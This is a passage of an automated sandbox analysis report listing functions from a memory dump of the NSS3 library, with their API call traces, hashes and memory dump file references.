PORT_ArenaMark_Util.NSS3(00000000,?,6C653FFF,00000000,?,?,?,?,?,6C651A1C,00000000,00000000), ref: 6C65ADA7

Part of subcall function 6C6B14C0: TlsGetValue.KERNEL32 ref: 6C6B14E0
Part of subcall function 6C6B14C0: EnterCriticalSection.KERNEL32 ref: 6C6B14F5
Part of subcall function 6C6B14C0: PR_Unlock.NSS3 ref: 6C6B150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C653FFF,00000000,?,?,?,?,?,6C651A1C,00000000,00000000), ref: 6C65ADB4

Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B10F3
Part of subcall function 6C6B10C0: EnterCriticalSection.KERNEL32(?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B110C
Part of subcall function 6C6B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1141
Part of subcall function 6C6B10C0: PR_Unlock.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1182
Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C653FFF,?,?,?,?,6C653FFF,00000000,?,?,?,?,?,6C651A1C,00000000), ref: 6C65ADD5

Part of subcall function 6C6AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C6A8D2D,?,00000000,?), ref: 6C6AFB85
Part of subcall function 6C6AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C6AFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C7794B0,?,?,?,?,?,?,?,?,6C653FFF,00000000,?), ref: 6C65ADEC

Part of subcall function 6C6AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7818D0,?), ref: 6C6AB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C653FFF), ref: 6C65AE3C

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: ebb193397e285113d0e189185152e1a2e5947280fed7943d174f79aaad0790c9
Instruction ID: 27ed6569a04d92954165ae014cd61dd11bdc312eeb750d1a6e9b737d0e3b2ae4
Opcode Fuzzy Hash: ebb193397e285113d0e189185152e1a2e5947280fed7943d174f79aaad0790c9
Instruction Fuzzy Hash: 06113B71E002096BE7109B659C40BBF77F8DF9624CF544228EC1596742FB20E96983FE

Function 6C6A8800 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C6B085A,00000000,?,6C658369,?), ref: 6C6A8821
TlsGetValue.KERNEL32(?,?,6C6B085A,00000000,?,6C658369,?), ref: 6C6A883D
EnterCriticalSection.KERNEL32(?,?,?,6C6B085A,00000000,?,6C658369,?), ref: 6C6A8856
PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C6A8887
PR_Unlock.NSS3(?,?,?,?,6C6B085A,00000000,?,6C658369,?), ref: 6C6A8899

Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407AD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407CD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407D6
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5D204A), ref: 6C6407E4
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,6C5D204A), ref: 6C640864
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C640880
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,6C5D204A), ref: 6C6408CB
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408D7
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408FB

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID:
API String ID: 2759447159-0
Opcode ID: 3545341c3fb847f36debd216b371121e2d7c5c379483e45944be1dd88ccdee94
Instruction ID: 5eed416c69ad6c07549fc7a1a1684139f266aad543e85f94a2543365d3f41228
Opcode Fuzzy Hash: 3545341c3fb847f36debd216b371121e2d7c5c379483e45944be1dd88ccdee94
Instruction Fuzzy Hash: 7121AEB4A04645DFCB04AFB8C4845AABBF4FF0A348F104666DC9497711EB30D896CB9A

Function 6C6728A0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C6680DD), ref: 6C6728BA
EnterCriticalSection.KERNEL32(?,?,?,?,6C6680DD), ref: 6C6728D3
PR_Unlock.NSS3(?,?,?,?,?,6C6680DD), ref: 6C6728E8
DeleteCriticalSection.KERNEL32(?,?,?,?,?,6C6680DD), ref: 6C67290E
free.MOZGLUE(?,?,?,?,?,?,6C6680DD), ref: 6C67291A

Part of subcall function 6C669270: DeleteCriticalSection.KERNEL32(?,?,6C675089,?,6C673B70,?,?,?,?,?,6C675089,6C66F39B,00000000), ref: 6C66927F
Part of subcall function 6C669270: free.MOZGLUE(?,?,6C673B70,?,?,?,?,?,6C675089,6C66F39B,00000000), ref: 6C669286
Part of subcall function 6C669270: PL_HashTableDestroy.NSS3(?,6C673B70,?,?,?,?,?,6C675089,6C66F39B,00000000), ref: 6C669292

Part of subcall function 6C668B50: TlsGetValue.KERNEL32(00000000,?,6C670948,00000000), ref: 6C668B6B
Part of subcall function 6C668B50: EnterCriticalSection.KERNEL32(?,?,?,6C670948,00000000), ref: 6C668B80
Part of subcall function 6C668B50: PL_FinishArenaPool.NSS3(?,?,?,?,6C670948,00000000), ref: 6C668B8F
Part of subcall function 6C668B50: PR_Unlock.NSS3(?,?,?,?,6C670948,00000000), ref: 6C668BA1
Part of subcall function 6C668B50: DeleteCriticalSection.KERNEL32(?,?,?,?,6C670948,00000000), ref: 6C668BAC
Part of subcall function 6C668B50: free.MOZGLUE(?,?,?,?,?,6C670948,00000000), ref: 6C668BB8

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
String ID:
API String ID: 3225375108-0
Opcode ID: ed5223697ab6abfdad6a7360f8f709c8d6c1f464c843d0d343bbd2c5306503e2
Instruction ID: a02292bf98528c272f22bd10b04adcca4b0646c72fa8574272f275d3b989babd
Opcode Fuzzy Hash: ed5223697ab6abfdad6a7360f8f709c8d6c1f464c843d0d343bbd2c5306503e2
Instruction Fuzzy Hash: F9215CB5A04B05DBCB00AF79C088569BBF4FF06359F054969DC9497B00EB31E895CBAA

Function 6C6409E0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,?,6C6406A2,00000000,?), ref: 6C6409F8
malloc.MOZGLUE(0000001F), ref: 6C640A18
memcpy.VCRUNTIME140(?,?,00000001), ref: 6C640A33

Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407AD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407CD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407D6
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5D204A), ref: 6C6407E4
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,6C5D204A), ref: 6C640864
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C640880
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,6C5D204A), ref: 6C6408CB
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408D7
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408FB

PR_Free.NSS3(?), ref: 6C640A6C
PR_Free.NSS3(?), ref: 6C640A87

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$Freecalloc$mallocmemcpy
String ID:
API String ID: 207547555-0
Opcode ID: 7949978d06a633e7bcf4fbf51e907b882c4dc5c0b6fbf2466e86d315253507ef
Instruction ID: 88920e550a1923b7ca3060af6b0ab2b0c2a8328300f8ac4f76f4411a6ac86378
Opcode Fuzzy Hash: 7949978d06a633e7bcf4fbf51e907b882c4dc5c0b6fbf2466e86d315253507ef
Instruction Fuzzy Hash: F71159B19007909BE7109F25C98479777B8FF22348F44D93AD85642E01FB31F498C794

Function 6C668FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C670710), ref: 6C668FF1
PR_CallOnce.NSS3(6C7B2158,6C669150,00000000,?,?,?,6C669138,?,6C670710), ref: 6C669029
calloc.MOZGLUE(00000001,00000000,?,?,6C670710), ref: 6C66904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C670710), ref: 6C669066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C670710), ref: 6C669078

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: ff90a53b7a5958ba3811b4957fa6c999bbb28d6900d858da33bf78c82e73b22a
Instruction ID: 45ba7cc42a50ff9c94cf7c6d53c32ccfcab0a193aba7bc86265c7a4583acb825
Opcode Fuzzy Hash: ff90a53b7a5958ba3811b4957fa6c999bbb28d6900d858da33bf78c82e73b22a
Instruction Fuzzy Hash: F011E57170011167EB101BAFAD04A6672ACEB827ADF540535FC84C6E40F752CD4583AE

Function 6C6E4AF0 Relevance: 7.6, APIs: 5, Instructions: 62COMMON

Download Yara Rule

APIs

PR_MemUnmap.NSS3(00015180,00000005,?,6C6E4AD1), ref: 6C6E4B62
free.MOZGLUE(?,00015180,00000005,?,6C6E4AD1), ref: 6C6E4B76

Part of subcall function 6C6E03C0: CloseHandle.KERNEL32(?,?,?,?,6C6E4B27,?,?,00015180,00000005,?,6C6E4AD1), ref: 6C6E03E0
Part of subcall function 6C6E03C0: GetLastError.KERNEL32(?,6C6E4B27,?,?,00015180,00000005,?,6C6E4AD1), ref: 6C6E03FD

Part of subcall function 6C6E03C0: DeleteCriticalSection.KERNEL32(00000005,?,?,?,6C6E4B27,?,?,00015180,00000005,?,6C6E4AD1), ref: 6C6E0419
Part of subcall function 6C6E03C0: free.MOZGLUE(?,?,6C6E4B27,?,?,00015180,00000005,?,6C6E4AD1), ref: 6C6E0420

CloseHandle.KERNEL32(?,00015180,00000005,?,6C6E4AD1), ref: 6C6E4B96
free.MOZGLUE(?,?,6C6E4AD1), ref: 6C6E4B9D
memset.VCRUNTIME140(6C7B2F9C,00000000,00000090,00015180,00000005,?,6C6E4AD1), ref: 6C6E4BB2

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: free$CloseHandle$CriticalDeleteErrorLastSectionUnmapmemset
String ID:
API String ID: 447902086-0
Opcode ID: f7ed421fb39aa8247f831ac7a10c013cd2dc6e24edf4a392552a30b6ed43f63e
Instruction ID: 30dcd8ec39ef2a9e8a5a2d682fac09e1a00b4bf10466e7b66f04ca5f1ce6b7ae
Opcode Fuzzy Hash: f7ed421fb39aa8247f831ac7a10c013cd2dc6e24edf4a392552a30b6ed43f63e
Instruction Fuzzy Hash: 18112232B07900ABDF20AEE4DC09F6A7336BB0A348F000035F50917A50EB72A485D7EE

Function 6C67CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C691E10: TlsGetValue.KERNEL32 ref: 6C691E36
Part of subcall function 6C691E10: EnterCriticalSection.KERNEL32(?,?,?,6C66B1EE,2404110F,?,?), ref: 6C691E4B
Part of subcall function 6C691E10: PR_Unlock.NSS3 ref: 6C691E76

free.MOZGLUE(?,6C67D079,00000000,00000001), ref: 6C67CDA5
PK11_FreeSymKey.NSS3(?,6C67D079,00000000,00000001), ref: 6C67CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C67D079,00000000,00000001), ref: 6C67CDCF
DeleteCriticalSection.KERNEL32(?,6C67D079,00000000,00000001), ref: 6C67CDE2
free.MOZGLUE(?), ref: 6C67CDE9

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 395bcc6dfda0238a1c5b62fc2acbd16cccad597adcd5ea1baec9598d07f6260e
Instruction ID: 8d795a9908144ea95030c7d7df076d2ee5efd470979185aa1a520f237f7481b2
Opcode Fuzzy Hash: 395bcc6dfda0238a1c5b62fc2acbd16cccad597adcd5ea1baec9598d07f6260e
Instruction Fuzzy Hash: 0211A3B2B01115BBDF10AFA5ED45A9A77BCBB043597104531F90A87E01E732E424C7E5

Function 6C6E2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C6E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C6E5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6E2CEC

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

PR_EnterMonitor.NSS3(?), ref: 6C6E2D02
PR_EnterMonitor.NSS3(?), ref: 6C6E2D1F
PR_ExitMonitor.NSS3(?), ref: 6C6E2D42
PR_ExitMonitor.NSS3(?), ref: 6C6E2D5B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 1318f6d3e3578dfac2ea355121da45e0d49ce3060982b1756f2fac1cc2e6c162
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 9A01C8B19192015FE7309F26FC48BC7B7E2EF59318F044526E95D87B10E632F8168796

Function 6C6E2D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C6E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C6E5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6E2D9C

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

PR_EnterMonitor.NSS3(?), ref: 6C6E2DB2
PR_EnterMonitor.NSS3(?), ref: 6C6E2DCF
PR_ExitMonitor.NSS3(?), ref: 6C6E2DF2
PR_ExitMonitor.NSS3(?), ref: 6C6E2E0B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 8cd1fd0e9f7aa794f7f02872431bdcf938dcf16bc214214ea6d5fc4e4a5f400c
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 9601C8B19092015FE7309F25FC09BC7B7A2EF55318F040536E95D87B10D632F81A8696

Function 6C67AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C663090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C67AE42), ref: 6C6630AA
Part of subcall function 6C663090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6630C7
Part of subcall function 6C663090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C6630E5
Part of subcall function 6C663090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C663116
Part of subcall function 6C663090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C66312B
Part of subcall function 6C663090: PK11_DestroyObject.NSS3(?,?), ref: 6C663154
Part of subcall function 6C663090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C66317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C6599FF,?,?,?,?,?,?,?,?,?,6C652D6B,?), ref: 6C67AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C6599FF,?,?,?,?,?,?,?,?,?,6C652D6B,?), ref: 6C67AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C652D6B,?,?,00000000), ref: 6C67AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C652D6B,?,?,00000000), ref: 6C67AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C652D6B,?,?), ref: 6C67AEA3

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 231267e74e44f7f89e0b1ec98a7d7b6f1f3836cdd63fc5fe74163871bfb4f554
Instruction ID: b0f0a6d6507ce0822123b77666430595a45d13287f37c90f980e570015f0b0e7
Opcode Fuzzy Hash: 231267e74e44f7f89e0b1ec98a7d7b6f1f3836cdd63fc5fe74163871bfb4f554
Instruction Fuzzy Hash: 3801D163B0401057E721916CAC81AEB31A98B8765CB081832E905D7B03F612DD0A53BF

Function 6C760930 Relevance: 7.5, APIs: 5, Instructions: 45fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,6C760C83), ref: 6C76094F
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C760C83), ref: 6C760974
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C760983
_PR_MD_UNLOCK.NSS3(?,?,6C760C83), ref: 6C76099F
OutputDebugStringA.KERNEL32(?,?,6C760C83), ref: 6C7609B2

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalDebugEnterOutputSectionStringfflushfwrite
String ID:
API String ID: 1872382454-0
Opcode ID: 28a016d3310e247204a455a2f650899775643e91e171a8f7b46c00ee8ce55d3b
Instruction ID: 36ed7d08aca894bc02d10d1f3d3f3d4bd3facbcb7e84ad818e6351fcefb0d630
Opcode Fuzzy Hash: 28a016d3310e247204a455a2f650899775643e91e171a8f7b46c00ee8ce55d3b
Instruction Fuzzy Hash: 720129B47052419FDF00AF6CE889F593BB9AB4731DF180275F84683B52EB36E450CA59

Function 6C762A40 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C762A5B
free.MOZGLUE(?), ref: 6C762A6D
strdup.MOZGLUE(?), ref: 6C762A7B
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C762A96
PR_ExitMonitor.NSS3 ref: 6C762AB5

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
